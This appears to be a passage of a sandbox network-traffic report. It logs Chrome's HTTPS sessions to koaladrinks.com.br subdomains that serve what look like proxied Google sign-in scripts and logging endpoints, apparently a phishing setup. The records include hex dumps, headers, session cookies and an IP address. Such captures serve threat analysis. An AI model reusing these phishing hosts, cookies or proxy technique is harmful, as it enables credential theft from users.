                                                      2025-01-10 08:27:59 UTC205INData Raw: 41 63 63 65 70 74 2d 43 68 3a 20 53 65 63 2d 43 48 2d 55 41 2d 41 72 63 68 2c 20 53 65 63 2d 43 48 2d 55 41 2d 42 69 74 6e 65 73 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 75 6c 6c 2d 56 65 72 73 69 6f 6e 2d 4c 69 73 74 2c 20 53 65 63 2d 43 48 2d 55 41 2d 4d 6f 64 65 6c 2c 20 53 65 63 2d 43 48 2d 55 41 2d 57 6f 57 36 34 2c 20 53 65 63 2d 43 48 2d 55 41 2d 46 6f 72 6d 2d 46 61 63 74 6f 72 73 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2c 20 53 65 63 2d 43 48 2d 55 41 2d 50 6c 61 74 66 6f 72 6d 2d 56 65 72 73 69 6f 6e 0d 0a
                                                      Data Ascii: Accept-Ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      2025-01-10 08:27:59 UTC13INData Raw: 41 6c 6c 6f 77 3a 20 50 4f 53 54 0d 0a
                                                      Data Ascii: Allow: POST
                                                      2025-01-10 08:27:59 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:59 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:59 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:59 UTC47INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 0d 0a
                                                      Data Ascii: Content-Type: application/json; charset=utf-8
                                                      2025-01-10 08:27:59 UTC83INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 41 63 63 6f 75 6e 74 73 53 69 67 6e 49 6e 55 69 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="AccountsSignInUi"
                                                      2025-01-10 08:27:59 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 38 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:58 GMT
                                                      2025-01-10 08:27:59 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 4d 6f 6e 2c 20 30 31 20 4a 61 6e 20 31 39 39 30 20 30 30 3a 30 30 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      2025-01-10 08:27:59 UTC196INData Raw: 50 65 72 6d 69 73 73 69 6f 6e 73 2d 50 6f 6c 69 63 79 3a 20 63 68 2d 75 61 2d 61 72 63 68 3d 2a 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 3d 2a 2c 20 63 68 2d 75 61 2d 66 75 6c 6c 2d 76 65 72 73 69 6f 6e 2d 6c 69 73 74 3d 2a 2c 20 63 68 2d 75 61 2d 6d 6f 64 65 6c 3d 2a 2c 20 63 68 2d 75 61 2d 77 6f 77 36 34 3d 2a 2c 20 63 68 2d 75 61 2d 66 6f 72 6d 2d 66 61 63 74 6f 72 73 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 3d 2a 2c 20 63 68 2d 75 61 2d 70 6c 61 74 66 6f 72 6d 2d 76 65 72 73 69 6f 6e 3d 2a 0d 0a
                                                      Data Ascii: Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      71192.168.2.949800139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:58 UTC659OUTGET /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
                                                      2025-01-10 08:27:59 UTC26INHTTP/1.1 400 Bad Request
                                                      2025-01-10 08:27:59 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:59 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:27:59 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:59 UTC40INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/html; charset=UTF-8
                                                      2025-01-10 08:27:59 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 37 3a 35 39 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:27:59 GMT
                                                      2025-01-10 08:27:59 UTC17INData Raw: 53 65 72 76 65 72 3a 20 50 6c 61 79 6c 6f 67 0d 0a
                                                      Data Ascii: Server: Playlog
                                                      2025-01-10 08:27:59 UTC28INData Raw: 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a
                                                      Data Ascii: Transfer-Encoding: chunked
                                                      2025-01-10 08:27:59 UTC2INData Raw: 0d 0a
                                                      Data Ascii:
                                                      2025-01-10 08:27:59 UTC5INData Raw: 36 34 39 0d 0a
                                                      Data Ascii: 649
                                                      2025-01-10 08:27:59 UTC1609INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d
                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      72192.168.2.949801139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:58 UTC442OUTGET /favicon.ico HTTP/1.1
                                                      Host: wwws.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202
                                                      2025-01-10 08:27:59 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:27:59 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:27:59 UTC10INData Raw: 41 67 65 3a 20 35 32 36 0d 0a
                                                      Data Ascii: Age: 526
                                                      2025-01-10 08:27:59 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:27:59 UTC39INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 20 6d 61 78 2d 61 67 65 3d 36 39 31 32 30 30 0d 0a
                                                      Data Ascii: Cache-Control: public, max-age=691200
                                                      2025-01-10 08:27:59 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:27:59 UTC28INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 0d 0a
                                                      Data Ascii: Content-Type: image/x-icon
                                                      2025-01-10 08:27:59 UTC85INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 2d 52 65 70 6f 72 74 2d 4f 6e 6c 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 73 74 61 74 69 63 2d 6f 6e 2d 62 69 67 74 61 62 6c 65 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                      2025-01-10 08:27:59 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:27:59 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 31 39 3a 31 33 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:19:13 GMT
                                                      2025-01-10 08:27:59 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 38 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 31 39 3a 31 33 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 18 Jan 2025 08:19:13 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      73192.168.2.949804139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:59 UTC2566OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WpP9Yc,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;L [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
                                                      2025-01-10 08:28:00 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:00 UTC22INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a
                                                      Data Ascii: Accept-Ranges: bytes
                                                      2025-01-10 08:28:00 UTC12INData Raw: 41 67 65 3a 20 32 32 39 33 34 0d 0a
                                                      Data Ascii: Age: 22934
                                                      2025-01-10 08:28:00 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:00 UTC35INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 0d 0a
                                                      Data Ascii: Cache-Control: no-cache, no-store
                                                      2025-01-10 08:28:00 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:00 UTC46INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/javascript; charset=UTF-8
                                                      2025-01-10 08:28:00 UTC92INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 4f 70 65 6e 65 72 2d 50 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 3b 20 72 65 70 6f 72 74 2d 74 6f 3d 22 62 6f 71 2d 69 6e 66 72 61 2f 69 64 65 6e 74 69 74 79 2d 62 6f 71 2d 6a 73 2d 63 73 73 2d 73 69 67 6e 65 72 73 22 0d 0a
                                                      Data Ascii: Cross-Origin-Opener-Policy: same-origin; report-to="boq-infra/identity-boq-js-css-signers"
                                                      2025-01-10 08:28:00 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:00 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 32 3a 30 35 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 02:05:46 GMT
                                                      2025-01-10 08:28:00 UTC40INData Raw: 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 31 30 20 4a 61 6e 20 32 30 32 36 20 30 32 3a 30 35 3a 34 36 20 47 4d 54 0d 0a
                                                      Data Ascii: Expires: Sat, 10 Jan 2026 02:05:46 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      74192.168.2.949802139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:59 UTC1279OUTPOST /log?format=json&hasfast=true&authuser=0 HTTP/1.1
                                                      Host: play.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      Content-Length: 397
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      Content-Encoding: gzip
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      Content-Type: application/binary
                                                      sec-ch-ua-full-version: "117.0.5938.134"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      X-Goog-AuthUser: 0
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-wow64: ?0
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Origin: https://ijgbload.koaladrinks.com.br
                                                      Sec-Fetch-Site: same-site
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Referer: https://ijgbload.koaladrinks.com.br/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: 801d-ce4a=a5d2d70dc467bcf857f4f208b24b4950de24cb3d2e90ac6adc868997a5f27202; NID=520=WW16bk8xhCKjLDzRMeKzleiHWeQ91IpeSlEndb-VpZL_gD5Yk1zwK_l2GrQDgUalD8_AM6emji9sq9EGwuKfaPf88fJvThafZPIhylhin4dskLYLY1kD5NOTq8DD0VvF9XJIuZfO5U2GVyp-Wh9bwFsZBcTa3CrR_i6GMtJcVhv0q92EBc4
                                                      2025-01-10 08:27:59 UTC397OUTData Raw: 1f 8b 08 00 00 00 00 00 00 0a ed 95 4d 4b c3 40 10 86 ff 8a ac d7 98 ec f7 87 e2 a1 f5 50 f0 e0 45 68 b5 9b 1c d2 26 b6 6b d3 8d a4 69 ad ff de e9 27 a8 d5 46 41 f0 20 0b 43 98 cc ce be ef 33 0b 6b 2d 09 fc bc 28 1a 07 7b 28 89 72 8f 3e 14 5a 8b 3a 65 39 2a f2 93 ab 71 55 4e 73 14 20 42 14 4a 02 8b 6e ca fa a2 75 d9 ae 52 9f 41 56 af 73 eb 22 37 9f ee ca 92 00 07 a8 e7 7c 56 3e cf 56 39 1c c2 82 8f a5 96 10 37 55 90 12 86 e9 90 30 be ea c1 61 cb 7a 25 b0 5b 08 0d 1a 10 51 4c 72 a3 a4 14 18 e3 0f 22 df fb b0 1b 7b 00 25 46 ee 71 34 28 ca 34 0b 27 65 5a a4 59 e5 fc 64 16 0e cb 69 38 a8 a2 05 8b 66 6e e4 9d 8f 5c 96 fb da 3d b8 bc 3a bd ef 2d c7 69 4f 3c e4 d3 a2 e8 d3 65 31 9c b4 65 da eb fa 41 a7 fb d2 67 d7 8b ec ae 35 bf a7 a6 8e b7 32 6c 8c c6 75 fd 34
                                                      Data Ascii: MK@PEh&ki'FA C3k-({(r>Z:e9*qUNs BJnuRAVs"7|V>V97U0az%[QLr"{%Fq4(4'eZYdi8fn\=:-iO<e1eAg52lu4
                                                      2025-01-10 08:28:00 UTC17INHTTP/1.1 200 OK
                                                      2025-01-10 08:28:00 UTC40INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 43 72 65 64 65 6e 74 69 61 6c 73 3a 20 74 72 75 65 0d 0a
                                                      Data Ascii: Access-Control-Allow-Credentials: true
                                                      2025-01-10 08:28:00 UTC45INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 58 2d 50 6c 61 79 6c 6f 67 2d 57 65 62 0d 0a
                                                      Data Ascii: Access-Control-Allow-Headers: X-Playlog-Web
                                                      2025-01-10 08:28:00 UTC66INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 69 6a 67 62 6c 6f 61 64 2e 6b 6f 61 6c 61 64 72 69 6e 6b 73 2e 63 6f 6d 2e 62 72 0d 0a
                                                      Data Ascii: Access-Control-Allow-Origin: https://ijgbload.koaladrinks.com.br
                                                      2025-01-10 08:28:00 UTC57INData Raw: 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 32 35 39 32 30 30 30 0d 0a
                                                      Data Ascii: Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      2025-01-10 08:28:00 UTC24INData Raw: 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 0d 0a
                                                      Data Ascii: Cache-Control: private
                                                      2025-01-10 08:28:00 UTC19INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a
                                                      Data Ascii: Connection: close
                                                      2025-01-10 08:28:00 UTC41INData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a
                                                      Data Ascii: Content-Type: text/plain; charset=UTF-8
                                                      2025-01-10 08:28:00 UTC44INData Raw: 43 72 6f 73 73 2d 4f 72 69 67 69 6e 2d 52 65 73 6f 75 72 63 65 2d 50 6f 6c 69 63 79 3a 20 63 72 6f 73 73 2d 6f 72 69 67 69 6e 0d 0a
                                                      Data Ascii: Cross-Origin-Resource-Policy: cross-origin
                                                      2025-01-10 08:28:01 UTC37INData Raw: 44 61 74 65 3a 20 46 72 69 2c 20 31 30 20 4a 61 6e 20 32 30 32 35 20 30 38 3a 32 38 3a 30 30 20 47 4d 54 0d 0a
                                                      Data Ascii: Date: Fri, 10 Jan 2025 08:28:00 GMT


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      75192.168.2.949803139.59.30.1934432960C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-10 08:27:59 UTC2585OUTGET /_/mss/boq-identity/_/js/k=boq-identity.AccountsSignInUi.en.GVgXMoL7NYg.es5.O/ck=boq-identity.AccountsSignInUi.0kxUC5tMpvM.L.B1.O/am=yQ2mZLgGABD_cGlAN6BIIGQAAAAAAAAAAMAGAACwww/d=1/exm=A7fCU,AvtSve,CMcBD,E87wgc,EFQ78c,EN3i8d,FCpbqb,Fndnac,I6YDgd,IZT63,K0PMbc,K1ZKnb,KUM7Z,L1AAkb,L9OGUe,LDQI,LEikZe,LvGhrf,MpJwZc,NOeYWe,NTMZac,NwH0H,O6y8ed,OTA3Ae,P6sQOc,PHUIyb,PrPYRd,RMhBfe,Rkm0ef,RqjULd,SCuOPb,SD8Jgb,STuCOe,SpsfSb,Tbb4sb,UUJqVe,Uas9Hd,WhJNk,WpP9Yc,Wt6vjf,YHI3We,YTxL4,YgOFye,ZDZcre,ZZ4WUe,ZwDk9d,_b,_tp,aC1iue,aW3pY,b3kMqb,bSspM,bTi8wc,byfTOb,cYShmd,cciGGe,f8Gu1e,hc6Ubd,hhhU8,iAskyc,inNHtf,lsjVmc,ltDFwf,lwddkf,m9oV,mvkUhe,n73qwf,oLggrd,oqkvIf,p3hmRc,pxq3x,q0xTif,qPYxq,qmdT9,rmumx,rv9FVb,sOXFj,siKnQd,soHxf,t2srLd,tUnxGc,vHEMJe,vfuNJf,vjKJJ,w9hDv,wg1P6b,ws9Tlc,xBaz7b,xQtZb,xUdipf,xiZRqc,y5vRwf,yRXbo,ywOR5c,z0u0L,zbML3c,ziXSP,ziZ8Mc,zr1jrb,zy0vNb/excm=_b,_tp,identifierview/ed=1/wt=2/ujg=1/rs=AOaEmlFCOKoBBerVGlbnsaabvKJ7jkr4hA/ee=ASJRFf:DAnQ7e;Al0B8:kibjWe;DaIJ8c:iAskyc;EVNhjf:pw70Gc;EkYFhd:GwYlN;EmZ2Bf:zr1jrb;Jsb [TRUNCATED]
                                                      Host: www3.koaladrinks.com.br
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
